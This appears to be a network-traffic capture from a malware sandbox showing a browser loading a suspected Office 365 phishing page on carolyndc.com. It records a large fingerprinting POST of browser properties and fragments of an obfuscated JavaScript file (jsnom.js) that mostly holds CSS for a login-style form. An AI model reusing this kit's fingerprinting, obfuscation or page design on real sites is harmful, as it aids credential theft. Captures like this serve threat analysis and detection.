2024-11-07 20:04:39 UTC	737	OUT	GET /m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N HTTP/1.1 Host: carolyndc.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:04:39 UTC	208	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 20:04:39 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-11-07 20:04:39 UTC	4726	IN	Data Raw: 31 32 36 39 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 59 6f 75 20 6e 65 65 64 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 74 6f 20 72 75 6e 20 74 68 69 73 20 61 70 70 2e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 72 6f Data Ascii: 1269<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body> <noscript>You need to enable JavaScript to run this app.</noscript> <div id="ro

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:04:40 UTC	969	OUT	POST /m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N HTTP/1.1 Host: carolyndc.com Connection: keep-alive Content-Length: 138992 Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://carolyndc.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:04:40 UTC	16384	OUT	Data Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65 Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
2024-11-07 20:04:40 UTC	16384	OUT	Data Raw: 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 43 6f 6e 74 72 6f 6c 6c Data Ascii: %22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultController%22%3A%22function+WritableStreamDefaultControll
2024-11-07 20:04:40 UTC	16384	OUT	Data Raw: 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 70 6f 6e 73 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 70 6f 6e 73 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 45 6e 74 72 79 25 32 32 25 Data Ascii: 2function+SVGAElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22Response%22%3A%22function+Response%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverSize%22%3A%22function+ResizeObserverSize%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverEntry%22%
2024-11-07 20:04:40 UTC	16384	OUT	Data Raw: 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 6e 75 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 Data Ascii: %22function+HTMLMenuElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMediaElement%22%3A%22function+HTMLMediaElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMarqueeElement%22%3A%22function+HTMLMarqueeElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22H
2024-11-07 20:04:40 UTC	16384	OUT	Data Raw: 6e 61 6c 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6f 66 66 73 63 72 65 65 6e 42 75 66 66 65 72 69 6e 67 25 32 32 25 33 41 74 72 75 65 25 32 43 25 32 32 57 65 62 41 73 73 65 6d 62 6c 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 57 65 62 41 73 73 65 6d 62 6c 79 25 35 44 25 32 32 25 32 43 25 32 32 41 62 73 6f 6c 75 74 65 4f 72 69 65 6e 74 61 74 69 6f 6e 53 65 6e 73 6f 72 25 32 32 25 33 41 25 32 32 66 Data Ascii: nal%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22AbortController%22%3A%22function+AbortController%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22offscreenBuffering%22%3Atrue%2C%22WebAssembly%22%3A%22%5Bobject+WebAssembly%5D%22%2C%22AbsoluteOrientationSensor%22%3A%22f
2024-11-07 20:04:40 UTC	16384	OUT	Data Raw: 73 66 65 72 50 61 63 6b 65 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 Data Ascii: sferPacket%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBIsochronousOutTransferResult%22%3A%22function+USBIsochronousOutTransferResult%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBOutTransferResult%22%3A%22function+USBOutTransferResult%28%29+%7B+%5Bnative+code
2024-11-07 20:04:40 UTC	16384	OUT	Data Raw: 74 72 65 61 6d 41 75 64 69 6f 44 65 73 74 69 6e 61 74 69 6f 6e 4e 6f 64 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 48 61 6e 64 6c 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 52 65 63 6f 72 64 65 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 72 72 6f 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 6e 63 72 79 70 74 65 64 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 6c 65 6d 65 6e 74 41 75 64 69 6f Data Ascii: treamAudioDestinationNode%22%2C%22MediaStream%22%2C%22MediaSourceHandle%22%2C%22MediaSource%22%2C%22MediaRecorder%22%2C%22MediaQueryListEvent%22%2C%22MediaQueryList%22%2C%22MediaList%22%2C%22MediaError%22%2C%22MediaEncryptedEvent%22%2C%22MediaElementAudio
2024-11-07 20:04:40 UTC	16384	OUT	Data Raw: 61 74 65 63 68 61 6e 67 65 25 32 32 25 32 43 25 32 32 6f 6e 73 63 72 6f 6c 6c 65 6e 64 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 50 6c 61 79 62 61 63 6b 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 43 53 53 41 6e 69 6d 61 74 69 6f 6e 25 32 32 25 32 43 25 32 32 43 53 53 54 72 61 6e 73 69 74 69 6f 6e 25 32 32 25 32 43 25 32 32 44 6f 63 75 6d 65 6e 74 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 63 6f 72 64 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 67 69 73 74 72 61 74 69 6f 6e 25 32 32 25 Data Ascii: atechange%22%2C%22onscrollend%22%2C%22AnimationPlaybackEvent%22%2C%22AnimationTimeline%22%2C%22CSSAnimation%22%2C%22CSSTransition%22%2C%22DocumentTimeline%22%2C%22BackgroundFetchManager%22%2C%22BackgroundFetchRecord%22%2C%22BackgroundFetchRegistration%22%
2024-11-07 20:04:40 UTC	7920	OUT	Data Raw: 6f 6d 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 4e 53 25 32 32 25 33 Data Ascii: omment%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createDocumentFragment%22%3A%22function+createDocumentFragment%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createElement%22%3A%22function+createElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createElementNS%22%3
2024-11-07 20:04:41 UTC	208	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 20:04:40 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-11-07 20:04:41 UTC	378	IN	Data Raw: 31 36 65 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 27 68 74 6d 6c 27 20 73 74 69 3d 27 56 6c 5a 4f 52 6c 56 71 52 54 42 4e 56 45 45 31 59 30 52 4a 4d 46 5a 55 52 54 42 4e 56 45 46 34 54 6b 52 56 4d 77 3d 3d 27 20 76 69 63 3d 27 27 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 6f 63 6b 65 74 2e 69 6f 2f 34 2e 37 2e 35 2f 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 27 20 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 32 68 75 61 5a 76 4f 52 39 69 44 7a 48 71 73 6c 71 77 70 52 38 37 69 73 45 6d 72 66 78 71 79 57 4f 46 37 68 72 37 42 59 36 4b 47 30 2b 68 56 4b 4c 6f 45 58 4d 50 55 4a 77 33 79 6e 57 75 68 Data Ascii: 16e<!DOCTYPE html><html id='html' sti='VlZORlVqRTBNVEE1Y0RJMFZURTBNVEF4TkRVMw==' vic='' lang='en'><head> <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuh

Timestamp	Bytes transferred	Direction	Data
2024-11-07 20:04:41 UTC	602	OUT	GET /m/jsnom.js HTTP/1.1 Host: carolyndc.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123N Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 20:04:42 UTC	263	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 20:04:41 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 07 Nov 2024 15:06:06 GMT Accept-Ranges: bytes Content-Length: 100217 Vary: Accept-Encoding Content-Type: text/javascript
2024-11-07 20:04:42 UTC	7929	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 39 65 62 30 35 20 3d 20 5f 30 78 35 39 65 62 28 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 31 66 61 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 66 61 65 35 39 2c 20 5f 30 78 33 39 31 66 64 35 29 20 7b 20 5f 30 78 31 66 61 65 35 39 20 3d 20 5f 30 78 31 66 61 65 35 39 20 2d 20 30 78 65 61 3b 20 6c 65 74 20 5f 30 78 63 62 63 31 36 39 20 3d 20 5f 30 78 35 39 65 62 30 35 5b 5f 30 78 31 66 61 65 35 39 5d 3b 20 72 65 74 75 72 6e 20 5f 30 78 63 62 63 31 36 39 3b 20 7d 2c 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 3b 20 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 Data Ascii: function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3
2024-11-07 20:04:42 UTC	8000	IN	Data Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 74 6f 70 3a 5c 78 32 30 30 25 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 78 2d 77 69 64 74 68 3a 5c 78 32 30 31 30 Data Ascii: 20\x20\x20\x20\x20margin-left:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-right:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20height:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-top:\x200%;\x0a\x20\x20\x20\x20\x20\x20\x20\x20max-width:\x2010
2024-11-07 20:04:42 UTC	8000	IN	Data Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 6f 72 64 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 70 70 65 61 72 61 6e 63 65 3a 5c 78 32 30 74 65 78 74 66 69 65 6c 64 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 5c 78 32 30 2d 69 6e 74 65 72 6e 61 6c 2d 6c 69 67 68 74 2d 64 61 72 6b 28 72 67 62 28 32 35 35 2c 5c 78 32 30 32 35 35 2c 5c 78 32 30 32 35 35 29 2c 5c 78 32 30 72 67 62 28 35 39 2c 5c 78 32 30 35 39 2c 5c 78 32 30 35 39 29 29 3b 5c 78 30 61 5c 78 32 30 5c 78 Data Ascii: 20\x20\x20\x20\x20\x20\x20\x20word-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20appearance:\x20textfield;\x0a\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20-internal-light-dark(rgb(255,\x20255,\x20255),\x20rgb(59,\x2059,\x2059));\x0a\x20\x
2024-11-07 20:04:42 UTC	8000	IN	Data Raw: 30 2e 73 68 72 69 6e 6b 6d 65 6e 75 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 6e 65 77 31 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 75 72 73 6f 72 3a 5c 78 32 30 70 6f 69 6e 74 65 72 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 Data Ascii: 0.shrinkmenu1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.new1\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20cursor:\x20pointer;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x2
2024-11-07 20:04:42 UTC	8000	IN	Data Raw: 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 6e 69 6d 61 74 69 6f 6e 3a 5c 78 32 30 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 2d 62 65 66 6f 72 65 5c 78 32 30 32 73 5c 78 32 30 69 6e 66 69 6e 69 74 65 5c 78 32 30 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 3a 61 66 74 65 72 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 65 66 74 3a 5c 78 32 30 2d 31 32 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 Data Ascii: 0\x20\x20\x20\x20\x20\x20\x20animation:\x20dot-floating-before\x202s\x20infinite\x20ease-in-out;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.dot-floating::after\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20left:\x20-12px;\x0a\x20\x20\x20\x20\x
2024-11-07 20:04:42 UTC	8000	IN	Data Raw: 34 33 5c 78 32 30 69 6e 70 75 74 5b 74 79 70 65 3d 5c 78 32 32 63 68 65 63 6b 62 6f 78 5c 78 32 32 5d 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 6e 6f 6e 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 76 69 73 69 62 69 6c 69 74 79 3a 5c 78 32 30 68 69 64 64 65 6e 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 63 68 65 63 6b 62 6f 78 2d 77 72 61 70 70 65 72 2d 34 33 5c 78 32 30 6c 61 62 65 6c 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 Data Ascii: 43\x20input[type=\x22checkbox\x22]\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20display:\x20none;\x0a\x20\x20\x20\x20\x20\x20\x20\x20visibility:\x20hidden;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.checkbox-wrapper-43\x20label\x20{\x0a\x20\x
